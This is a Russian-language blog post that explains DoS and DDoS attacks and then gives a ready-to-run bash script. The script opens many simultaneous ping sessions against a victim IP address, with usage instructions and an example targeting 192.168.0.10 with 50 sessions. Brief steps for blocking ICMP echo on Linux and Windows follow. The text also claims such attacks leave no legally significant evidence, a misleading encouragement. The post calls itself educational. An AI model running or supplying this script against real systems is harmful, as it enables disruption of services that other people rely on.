Элементарная DoS атака

Декабрь 25, 2018

DoS (Denial of Service) — атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не могут получить доступ к предоставляемым системным ресурсам.
DDoS (Distributed Denial of Service) — DoS атака выполняется одновременно с большого числа компьютеров. Такая атака проводится в том случае, если требуется вызвать отказ в обслуживании хорошо защищённой крупной компании или правительственной организации.
В настоящее время DoS и DDoS-атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик.
Напишем скрипт простейшей DoS атаки с помощью утилиты ping.

Текст скрипта:

#!/bin/bash
if [[ ( $1 == "" ) || ( $2 == "" ) ]]; then
echo "Script usage is: $0 IP_Address_of_Victim Num_Of_Attack_Session"
exit
else
for (( i=1; i<=$2; i++ )); do
xterm -e ping $1 &
done
fi
echo "DoS Attack to [$1] with $2 attackers executed Succsessfully!"

Где:
$1 — первый передаваемый параметр это ip
$2 — второй, количество одновременных атак

Сделаем скрипт исполняемым
sudo chmod +x DoS.sh
при условии что вы назвали файл DoS.sh

Запуск
./DoS.sh IP Session

Пример
./DoS.sh 192.168.0.10 50
Будет запущено 50 сессий пингования и атакован 192.168.0.10

Блокировка атаки на Linux

Заблокировать ответ на ping:
sudo echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
Разблокировать ответ на ping:
sudo echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

Блокировка атаки на Windows

Adminisrative Tools > Windows Firewall > Inbound Rules

Блокировка ping-flood на Windows

Выбрать все
File and Printer Sharing (Echo Request — ICMPv4-In)

Перейти в свойства и выбрать «Заблокировать соединение»
Properties > Block the connection

Это наиболее простой способ DoS атаки. Но имейте ввиду что ваш провайдер и его оборудование тоже видят и ощущают её на себе. Очень большое количество мелких пакет не может пройти бесследно. Если вы станете проблемой для провайдера, вас скорее всего отключат и прийдётся звонить и объяснять что у вас вирусы и вы уже удалили их. Как скоро вы станете проблемой и как скоро вас вычислят и отключат уже зависит от провайдера и его оборудования. Времени будет от половины дня до пары суток.
Так на примере утилиты ping и скрипта bash мы рассмотрели элементарную DoS атаку и оборвали её, на атакуемом сервере. Материал выложен в ознакомительно-образовательных целях.

Теги статьи:
· ·
Категории статьи
Безопасность

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *